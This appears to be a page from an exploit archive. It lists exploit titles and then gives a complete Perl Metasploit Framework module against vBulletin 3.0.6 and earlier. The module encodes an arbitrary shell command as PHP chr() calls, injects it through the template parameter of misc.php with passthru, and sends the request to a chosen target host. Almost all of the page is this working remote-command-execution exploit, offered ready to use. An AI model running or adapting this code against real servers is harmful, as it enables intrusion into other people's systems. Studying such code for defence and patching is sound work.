
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
106 lines
3.3 KiB
Perl
Executable file
106 lines
3.3 KiB
Perl
Executable file
##
|
|
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
|
|
# Name: php_vb3_0_6.pm
|
|
# License: Artistic/BSD/GPL
|
|
# Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
|
|
#
|
|
#
|
|
# - This is an exploit module for the Metasploit Framework, please see
|
|
# http://metasploit.com/projects/Framework for more information.
|
|
##
|
|
|
|
package Msf::Exploit::php_vb3_0_6;
|
|
use base "Msf::Exploit";
|
|
use strict;
|
|
use Pex::Text;
|
|
use bytes;
|
|
|
|
my $advanced = { };
|
|
|
|
my $info = {
|
|
'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
|
|
'Version' => '$Revision: 1.0 $',
|
|
'Authors' => [ 'str0ke' ],
|
|
'Arch' => [ ],
|
|
'OS' => [ ],
|
|
'Priv' => 0,
|
|
'UserOpts' =>
|
|
{
|
|
'RHOST' => [1, 'ADDR', 'The target address'],
|
|
'RPORT' => [1, 'PORT', 'The target port', 80],
|
|
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
|
|
'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
|
|
'SSL' => [0, 'BOOL', 'Use SSL'],
|
|
},
|
|
|
|
'Description' => Pex::Text::Freeform(qq{
|
|
This module exploits a code execution flaw in vBulletin <= 3.0.6.
|
|
}),
|
|
|
|
'Refs' =>
|
|
[
|
|
['MIL', '832'],
|
|
],
|
|
|
|
'Payload' =>
|
|
{
|
|
'Space' => 512,
|
|
'Keys' => ['cmd', 'cmd_bash'],
|
|
},
|
|
|
|
'Keys' => ['vBulletin'],
|
|
};
|
|
|
|
sub new {
|
|
my $class = shift;
|
|
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
|
return($self);
|
|
}
|
|
|
|
sub Exploit {
|
|
my $self = shift;
|
|
my $target_host = $self->GetVar('RHOST');
|
|
my $target_port = $self->GetVar('RPORT');
|
|
my $vhost = $self->GetVar('VHOST') || $target_host;
|
|
my $path = $self->GetVar('RPATH');
|
|
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
|
|
|
|
# Encode the command as a set of chr() function calls
|
|
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
|
|
|
|
# Create the get request data
|
|
my $data = "?do=page&template={\${passthru($byte)}}";
|
|
|
|
my $req =
|
|
"GET $path$data HTTP/1.1\r\n".
|
|
"Host: $vhost:$target_port\r\n".
|
|
"Content-Type: application/html\r\n".
|
|
"Content-Length: ". length($data)."\r\n".
|
|
"Connection: Close\r\n".
|
|
"\r\n";
|
|
|
|
my $s = Msf::Socket::Tcp->new(
|
|
'PeerAddr' => $target_host,
|
|
'PeerPort' => $target_port,
|
|
'LocalPort' => $self->GetVar('CPORT'),
|
|
'SSL' => $self->GetVar('SSL'),
|
|
);
|
|
|
|
if ($s->IsError){
|
|
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
|
return;
|
|
}
|
|
|
|
$self->PrintLine("[*] Sending the malicious vBulletin Get request...");
|
|
|
|
$s->Send($req);
|
|
|
|
my $results = $s->Recv(-1, 20);
|
|
$s->Close();
|
|
|
|
return;
|
|
}
|
|
|
|
1;
|
|
|
|
# milw0rm.com [2005-08-03]
|